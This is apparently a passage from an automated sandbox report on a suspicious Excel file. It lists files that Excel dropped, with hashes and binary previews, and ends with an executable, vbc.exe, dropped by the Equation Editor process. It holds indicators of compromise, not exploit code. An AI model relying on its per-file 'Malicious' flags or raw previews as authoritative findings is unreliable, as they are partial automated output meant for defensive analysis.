SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23E59210.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38FE8D8B.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54167E84.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6369A9D3.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A346607.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E6ACAD1.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 779 x 181, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5842
Entropy (8bit):	7.92185581034873
Encrypted:	false
SSDEEP:	96:+Q9KyOE9ulJ01zAcTCcAZd+0Mvin1EFi0sAMcNV99iyysx8JXmaaINsWHfjMzNzl:4yvmJ0VmQE/Ovi0aa5EMzNzl
MD5:	871E67261292737F85DEE051B2EF5B1A
SHA1:	3108E69E8BEABB0CD820696E9F22889B5E7D3224
SHA-256:	F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
SHA-512:	3C0CC7DF2D5080166C1C35C0D120CA686A8EF09348AB0F28CE6859FEC9F7DD3AB16955D79E1C092A5D78666FAE978F69E632D9FB307776E69FD586ADA605FEAF
Malicious:	false
Preview:	.PNG........IHDR.............'P......gAMA......a.....sRGB.........pHYs..........o.d....PLTE...............LLL.....................................................................ppp......`.6................?.6.._...`Bi...Y..f...%E........_...5DG....._.tNq.8.6..<?.....5...PVj..X.1...4U..._z..ANTT.b...kt..zZ5...........__..........~.......ff`.........H#....DIDATx..[.[....R..lK.\|....E*........P.....sz...3..I...X#.....ffwv...n...~:.X...E}......\`}.g..>.3.X........r!.`.:..B8\.f0f....lx4..7s.o....F.&..\............s!\........o.....Ssa....1.X.<9."sso...G.\XX..q.2.....D@.0...".'.'/0.......K.px......X.....`......iD..c.-.....J//.o.,....<......9m). ..R...@'..q.y....N..&$...v94.q..<.w.\.P......f_.... ...B.0}o.....y......l.Z..PzRb..F.....[..)..........J,....B....t(..BR...w .Q...S...H...{.....7P........o...Ol..fV.\.........}.......A'.g.:E.7.u.........\|.5pDj..f0.E:n..'. .....E..j^..tp\H;....3...C\..u.e..P.{...6.9....".6M....K..".F.D.a0.....\|>.T...x.Yj....C".

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\967104B5.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96A4929E.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B50A5659.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BBA2B1B8.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC7AE3BD.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1183280
Entropy (8bit):	2.09611672026846
Encrypted:	false
SSDEEP:	3072:v34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+D8nG/qc+D:v4UcLe0JOcXuunhqcIhqcE
MD5:	BBE2236B826DC12D03BF8FE425D79AF1
SHA1:	5EF7278C3E84B96E276068CC09A27D0A87E07FD7
SHA-256:	F2CB2541943FAA0400C559BB58650D65CC2BB08024227C78F369EB1263BDFBBF
SHA-512:	3B05B6F4597BD4A560DCC0C93C2A8D01612BB916F819BFDFDB31F186EABC48E2F1B8BC2820FDA2B37F279611D5869F83D34773E1F286573C02E66EB7CE60EB94
Malicious:	false
Preview:	....l...............j...........m>...B.. EMF....0...3...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................X$.......-z.X.@..%.......<........... ....N5Y.....................N5Y........ ....y.X........ .........Z..z.X.................................OE.....%...X...%...7...................{$..................C.a.l.i.b.r.i...-.0...d....._`.X..............Z....vdv......%...........%...........%...........!...............................".......................%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....k.......L.......................P... ...6...F...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE9ED886.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 779 x 181, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5842
Entropy (8bit):	7.92185581034873
Encrypted:	false
SSDEEP:	96:+Q9KyOE9ulJ01zAcTCcAZd+0Mvin1EFi0sAMcNV99iyysx8JXmaaINsWHfjMzNzl:4yvmJ0VmQE/Ovi0aa5EMzNzl
MD5:	871E67261292737F85DEE051B2EF5B1A
SHA1:	3108E69E8BEABB0CD820696E9F22889B5E7D3224
SHA-256:	F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
SHA-512:	3C0CC7DF2D5080166C1C35C0D120CA686A8EF09348AB0F28CE6859FEC9F7DD3AB16955D79E1C092A5D78666FAE978F69E632D9FB307776E69FD586ADA605FEAF
Malicious:	false
Preview:	.PNG........IHDR.............'P......gAMA......a.....sRGB.........pHYs..........o.d....PLTE...............LLL.....................................................................ppp......`.6................?.6.._...`Bi...Y..f...%E........_...5DG....._.tNq.8.6..<?.....5...PVj..X.1...4U..._z..ANTT.b...kt..zZ5...........__..........~.......ff`.........H#....DIDATx..[.[....R..lK.\|....E*........P.....sz...3..I...X#.....ffwv...n...~:.X...E}......\`}.g..>.3.X........r!.`.:..B8\.f0f....lx4..7s.o....F.&..\............s!\........o.....Ssa....1.X.<9."sso...G.\XX..q.2.....D@.0...".'.'/0.......K.px......X.....`......iD..c.-.....J//.o.,....<......9m). ..R...@'..q.y....N..&$...v94.q..<.w.\.P......f_.... ...B.0}o.....y......l.Z..PzRb..F.....[..)..........J,....B....t(..BR...w .Q...S...H...{.....7P........o...Ol..fV.\.........}.......A'.g.:E.7.u.........\|.5pDj..f0.E:n..'. .....E..j^..tp\H;....3...C\..u.e..P.{...6.9....".6M....K..".F.D.a0.....\|>.T...x.Yj....C".

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C66FDE9A.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7608
Entropy (8bit):	5.081534585293476
Encrypted:	false
SSDEEP:	96:+SScL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5SMjU+H3tWa6WdTfOYLpR8d
MD5:	34734D58A005F28BC9049B43A3E75B3A
SHA1:	B7B46F5D1DFDCAC3CD18117CFC15501758F1B03E
SHA-256:	FE46C65A2F5E133536E8B774CFFCF8BEBC38322420341D12DA0AF672C3F1605C
SHA-512:	4734DD55FD4737C9B75F84908E75B3D5F9A52F9787D847E19B61B2CDE1B975A53A502832533C00F73BFE49B01DE194CA51976F063C30E71C3D65240BAD5838D2
Malicious:	false
Preview:	....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....%.d.......................@......p....\......................p.........6Pv...p....`..p.g..$y.v.L....2............v....$.......d.......$....^.p.....^.p.C...L..`.....2.-........<.v................<.>v.Z.v....X.Ud.....g.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBFEF85C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\Desktop\~$oustanding 03082921.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1336832
Entropy (8bit):	7.015277955515814
Encrypted:	false
